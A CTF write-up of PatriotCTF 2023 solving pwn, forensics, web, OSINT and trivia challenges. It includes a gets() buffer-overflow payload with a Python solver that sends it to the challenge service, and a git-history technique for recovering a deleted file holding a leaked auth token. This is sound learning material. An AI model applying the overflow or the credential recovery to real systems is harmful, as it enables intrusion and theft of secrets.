PatriotCTF 2023: Step-by-Step Walkthrough


🔓 Pwn

1. Guessing game

"No one seems to be able to guess my favorite animal... Can you?"

Connecting to the provided socket, we are greeted with:
Hello there, friend! Can you guess my favorite animal?

Typing in a random animal like Tiger, we get the reply:
That's not my favorite animal... I promise!

My first step was to run strings on the provided binary; we see the name "Giraffe", but it doesn't work. I didn't see anything else useful, so I moved on to Ghidra.

Ghidra functions:

  • main()

  • check()

  • outputFlag()

main():

undefined8 main(void)

{
  puts("Hello there, friend! Can you guess my favorite animal?");
  check();
  return 0;
}

check():

void check(void) {
  int iVar1;
  undefined8 local_140;
  char local_138 [300];
  int local_c;


  local_140 = 0x65666661726947;
  local_c = 0;
  printf("Input guess: ");
  gets(local_138);
  iVar1 = strcmp(local_138,(char *)&local_140);
  if (iVar1 == 0) {
    puts("That\'s not my favorite animal... I promise!");
  }
  else {
    puts("ERRR! Wrong!");
  }
  if (local_c != 0) {
    puts("I wasn\'t able to trick you...");
    outputFlag();
  }
  return;
}

outputFlag():

void outputFlag(void)

{
  char local_38 [40];
  FILE *local_10;

  local_10 = fopen("flag.txt","r");
  if (local_10 == (FILE *)0x0) {
    printf("Unable to find flag.txt :(");
  }
  else {
    fgets(local_38,0x23,local_10);
    printf("%s",local_38);
  }
  fclose(local_10);
  return;
}

From this code we can clearly see the use of gets() in check(): local_138, a 300-byte buffer, is passed to gets(), which never checks the length of its input. The comparison against "Giraffe" (the 8-byte value in local_140 is that string, little-endian) only picks which message is printed; the flag is printed when local_c is non-zero, and nothing in the program ever sets it. Ghidra's local names give the stack layout: local_138 sits at offset -0x138 and local_c at -0xc, and 0x138 - 0xc = 300, so local_c starts immediately after the end of the buffer.

As a PWN noob, my first intuition was to overflow the buffer, so I did:
print('A'*301)

The 301st 'A' overwrites the low byte of local_c, making it non-zero, and we got the flag!
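The one-liner above is all the challenge needs. As an added example that is not part of the original writeup, the script below turns the same reasoning into a reusable solver: it derives the 300-byte distance from the Ghidra frame offsets, builds the 301-byte payload, sends it to the service and pulls a PCTF{...} string out of the reply. The host and port are whatever the challenge page listed (they are command-line arguments here), and only the standard library is used.

```python
"""Solver for the Guessing Game overflow.

Added example, not the writeup's own one-liner. It assumes the Ghidra
frame offsets shown above (local_138 at -0x138, local_c at -0xc) and a
host/port taken from the challenge page; both are parameters here.
"""
import re
import socket
import sys
from typing import Optional

FLAG_RE = re.compile(rb"PCTF\{[^}]*\}")


def overflow_length(buf_offset: int, target_offset: int) -> int:
    """Bytes from the start of the buffer to the variable we want to clobber.

    Ghidra names locals by their offset below the frame base, so local_138
    is at -0x138 and local_c at -0xc; the difference (300 here) equals the
    buffer size, which is why byte 301 lands in local_c.
    """
    return buf_offset - target_offset


def build_payload(buf_offset: int = 0x138, target_offset: int = 0xC) -> bytes:
    """Fill the buffer and overwrite the first byte of local_c with 'A' (0x41).

    gets() stops at the newline and stores a NUL after the data, so the NUL
    lands in local_c's second byte; the low byte is already non-zero.
    """
    return b"A" * (overflow_length(buf_offset, target_offset) + 1) + b"\n"


def extract_flag(output: bytes) -> Optional[str]:
    """Return the first PCTF{...} token in the service output, if any."""
    m = FLAG_RE.search(output)
    return m.group(0).decode() if m else None


def solve(host: str, port: int, timeout: float = 5.0) -> Optional[str]:
    """Send the payload to the remote service and return the flag it prints."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_payload())
        chunks = []
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return extract_flag(b"".join(chunks))


if __name__ == "__main__":
    # usage: python solve.py <host> <port>   (host/port from the challenge page)
    print(solve(sys.argv[1], int(sys.argv[2])))
```

Because the program prints the flag only on local_c != 0, any non-zero byte works as the 301st character; 'A' is used simply because it is printable.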

🔍 Forensics

2. Capybara

What a cute picture of a capybara!

Since it was a forensics challenge, I went ahead and checked the EXIF data, but found nothing useful. I also tried cracking a stego password, but failed.

Then I looked for embedded files with binwalk and got:

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
151174        0x24E86         Zip archive data, at least v2.0 to extract, compressed size: 6902, uncompressed size: 919160, name: audio.wav
158170        0x269DA         End of Zip archive, footer length: 22

So I extracted it with:
binwalk -e capybara.jpeg

This gives us audio.wav, a long recording of Morse code.
I decoded it with an online audio-to-text Morse decoder.

The result was a hexadecimal string, and decoding that hex gives the flag:
PCTF{d0_y0U_kN0W_h0W_t0_R34D_m0r53_C0d3?}
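As an added example that is not part of the original writeup, the script below does the two mechanical steps of this challenge in Python: carving the ZIP out of the JPEG at the PK\x03\x04 signature that binwalk reported (what binwalk -e does), and turning Morse into hex digits and hex into the flag. The JPEG and the archive member are constructed inline so it runs offline; the real audio.wav is a recording, and converting beeps into dots and dashes (the step done with the online decoder) is not covered here.

```python
"""Carve a ZIP embedded in a JPEG and decode a Morse-encoded hex string.

Added example, not part of the original writeup. The JPEG, the archive and
its audio.wav member are constructed inline (the member holds Morse text,
not audio) so the script runs without the real capybara.jpeg.
"""
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"  # signature binwalk reports as "Zip archive data"

# International Morse for the characters a hex dump can contain.
MORSE = {
    "A": ".-", "B": "-...", "C": "-.-.", "D": "-..", "E": ".", "F": "..-.",
    "0": "-----", "1": ".----", "2": "..---", "3": "...--", "4": "....-",
    "5": ".....", "6": "-....", "7": "--...", "8": "---..", "9": "----.",
}
FROM_MORSE = {code: ch for ch, code in MORSE.items()}


def carve_zip(blob: bytes) -> dict:
    """Return {member name: bytes} for the first ZIP archive inside blob.

    Offsets inside a ZIP are relative to the start of the archive, so the
    bytes from the local-header signature onward form a valid stand-alone
    archive on their own. Returns {} when no archive is present.
    """
    start = blob.find(ZIP_LOCAL_HEADER)
    if start < 0:
        return {}
    with zipfile.ZipFile(io.BytesIO(blob[start:])) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def text_to_morse(text: str) -> str:
    """Encode hex digits as Morse, one space between symbols."""
    return " ".join(MORSE[c] for c in text.upper())


def morse_to_text(code: str) -> str:
    """Decode space-separated Morse symbols; '/' (or any unknown symbol) becomes a space."""
    return "".join(FROM_MORSE.get(sym, " ") for sym in code.split())


def morse_hex_to_ascii(code: str) -> str:
    """The challenge's last step: Morse -> hex digits -> ASCII flag."""
    # bytes.fromhex ignores whitespace, so "50 43" and "5043" both work.
    return bytes.fromhex(morse_to_text(code)).decode("ascii")


def build_sample(secret: str = "PCTF{constructed_sample}") -> bytes:
    """Constructed stand-in for capybara.jpeg: JPEG header, filler, then a ZIP
    whose audio.wav member holds the Morse text instead of real audio."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("audio.wav", text_to_morse(secret.encode().hex()))
    jpeg_header = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 128
    return jpeg_header + zbuf.getvalue()


if __name__ == "__main__":
    members = carve_zip(build_sample())
    print(list(members))                                    # ['audio.wav']
    print(morse_hex_to_ascii(members["audio.wav"].decode()))
```

Python's zipfile can also open the whole JPEG directly, because it locates the archive from the end-of-central-directory record and compensates for prepended data; slicing at the signature is shown because it mirrors what binwalk reports and what binwalk -e extracts.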

🌐 Web

3. Scavenger Hunt

Can you find all the hidden pieces of the flag?

(1/5) PCTF{Hunt - shown on index.html
(2/5) 3r5_4n - in the source of index.html
(3/5) D_g4tH3 - in robots.txt
(4/5) R5_e49 - in the JS code
(5/5) e4a541} - in the cookies

Flag: PCTF{Hunt3r5_4nD_g4tH3r3R5_e49e4a541}

🔗 OSINT

4. Bad Documentation

"I heard that this security researcher accidentally leaked his password in his documentation, but he deleted all the files in his repository so now we don't have access to it anymore! I'm pretty sure it's hopeless, but if you think you can find it here's the link to the repo: github.com/Th3Burn1nat0r/vuln."

I cloned the repo and checked for leaks across all the commits; one commit stood out:

commit 52552b52ac8ad993d150ff83a8e12bfeee6e74e6
Author: Th3Burn1nat0r <128736125+Th3Burn1nat0r@users.noreply.github.com>
Date:   Thu Mar 23 13:56:43 2023 -0400

    Add files via upload

I went back to that commit with:

git reset 52552b52ac8ad993d150ff83a8e12bfeee6e74e6

Without --hard this is a mixed reset: HEAD and the index move back to that commit, but the working tree is left untouched, so the files that a later commit deleted now show up as unstaged deletions (the index has them, the working directory does not).

git status:

Changes not staged for commit:
  (use "git add/rm <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
    deleted:    J-Link/JLE24007
    deleted:    J-Link/JLE25006
    deleted:    J-Link/JLE25006.png

Now restore the deleted files from the index with:
git restore *

This brings back a PNG image, J-Link/JLE25006.png, which looks like a Burp screenshot.

It is easy to miss at first, but the request in the screenshot carries an Authorization header with a token. Read it out with an OCR tool and base64-decode it to get the flag.

5. Rogue Access Point

We've received a notice from our company's EDR software that a laptop was attacked while they were on WFH. The employee says they were at home when it happened, but we suspect they were using public wifi. Our EDR software managed to capture the BSSID of the wifi (46:D1:FA:63:BC:66) network before it got disconnected, but not the SSID. Can you still find the network they were connected to?

For anything SSID/BSSID related I use wigle.net,
a map of Wi-Fi networks around the world that can be searched by BSSID.

We have BSSID: 46:D1:FA:63:BC:66

I entered the BSSID and pressed Filter, which pointed to a location near Washington, US.
To get more details about the matched network you need to log in.

Zooming in, we find the BSSID belongs to "Red's Table Free Wifi", which is also the SSID.

Flag: PCTF{Red's Table Free Wifi}

💡 MISC

6. Uh Oh!

Uh Oh! While trying to add passwords to my wordlist, I accidentally added my own phone number! Can you tell me what line it's on?
For example (123) 456-7890

Flag format: PCTF{linenumber_phonenumonlynumbers}

We are given the rockyou.txt wordlist, and the phone number is somewhere in it. A regex that matches the stated format finds it in one pass.

REGEX i used:
cat -n rockyou.txt | grep -P '\(\d{3}\) \d{3}-\d{4}'

where,
-n = number the output lines (grep -n would do the same without the cat)
-P = use Perl-compatible regex, which understands \d
\d = matches a single digit
{n} = matches exactly n repetitions of the preceding token

$ cat -n rockyou.txt | grep -P '\(\d{3}\) \d{3}-\d{4}'
7731484    (404) 303-7283

FLAG: PCTF{7731484_4043037283}
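As an added example that is not part of the original writeup, here is the same search in Python over a constructed stand-in for rockyou.txt: it numbers lines from 1 as cat -n does, ignores near-misses that the regex must not match, and reads the file in binary mode because rockyou.txt is not valid UTF-8 and a text-mode read raises UnicodeDecodeError part-way through the file.

```python
"""Locate a phone number of the form (123) 456-7890 in a wordlist.

Added example, not part of the original writeup. SAMPLE_WORDLIST is
constructed; scan_wordlist() takes a path so it can be run on rockyou.txt.
"""
import re
from typing import Iterable, List, Tuple

# Same pattern as the grep -P above, with groups capturing the digit runs.
PHONE_RE = re.compile(rb"\((\d{3})\) (\d{3})-(\d{4})")


def find_phone_numbers(lines: Iterable[bytes]) -> List[Tuple[int, str]]:
    """Return (line number, digits only) for every line matching the format."""
    hits = []
    for lineno, line in enumerate(lines, start=1):  # cat -n also counts from 1
        m = PHONE_RE.search(line)
        if m:
            hits.append((lineno, b"".join(m.groups()).decode("ascii")))
    return hits


def to_flag(lineno: int, digits: str) -> str:
    """PCTF{linenumber_phonenumonlynumbers}, the format the challenge asks for."""
    return f"PCTF{{{lineno}_{digits}}}"


def scan_wordlist(path: str) -> List[str]:
    """Scan a wordlist file; binary mode avoids decoding errors on rockyou.txt."""
    with open(path, "rb") as f:
        return [to_flag(n, d) for n, d in find_phone_numbers(f)]


# Constructed sample wordlist: decoys the regex must skip, and one real hit.
SAMPLE_WORDLIST = (
    b"123456\n"
    b"caf\xe9\n"          # non-UTF-8 byte, as in many rockyou entries
    b"404-303-7283\n"     # wrong format: no parentheses
    b"(404)303-7283\n"    # wrong format: no space after the area code
    b"(404) 303-7283\n"   # the format the challenge describes
    b"iloveyou\n"
).splitlines(keepends=True)


if __name__ == "__main__":
    for lineno, digits in find_phone_numbers(SAMPLE_WORDLIST):
        print(to_flag(lineno, digits))
```

Because the pattern is anchored by the literal parentheses, space and hyphen, bare digit runs and variants without the space are skipped, which is why the grep above returned a single line.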

🤓 Trivia

7. 1972 Schism

Before George Mason University became its own college, GMU was a satellite school of what other commonwealth college?

A simple Google search says "University of Virginia", abbreviated 'UVA'.

FLAG: PCTF{UVA}

8. Mascot Conundrum

After GMU's brief foray into the Final Four, administration decided to change the school mascot to the modern day hat wearing, green and gold donned Patriot we know and love. However, before this GMU had several different mascots, one of which was particularly loved by students and faculty alike. What was the name of the mascot that preceded The Patriot?

A Google search leads to this page:
https://www.gmu.edu/news/2022-03/archives-history-mason-mascots

It links to a YouTube video on the top 6 mascots in GMU history; watching it shows that Gunston was the mascot that preceded the current one.

FLAG: PCTF{Gunston}

9. Mason ID OSINT

Since 2010, all student IDs at GMU have featured a photo of one of the prominent buildings on campus. Can you figure out the individual for which the building featured on the Mason ID is named after? Your answer should be in the format PCTF{FirstName, LastName}

This one honestly took some searching. A quick search shows the building is the Johnson Center on the Fairfax campus. But who is Johnson?

I reached out to ChatGPT who came up with a name 'Lywood Johnson', who probably never existed.

After some more searching, I found this page on GMU's website: https://www.gmu.edu/news/2022-07/retro-mason-johnson-center-dedication-1996

Flag: PCTF{George, Johnson}

Takeaway

As a self-proclaimed Jeopardy-style CTF noob, it was not satisfying that I couldn't solve more web and crypto challenges. But I guess I'm fine with the OSINT ones. Now it's time to practice some PWN and crypto before moving on to the next CTFs.
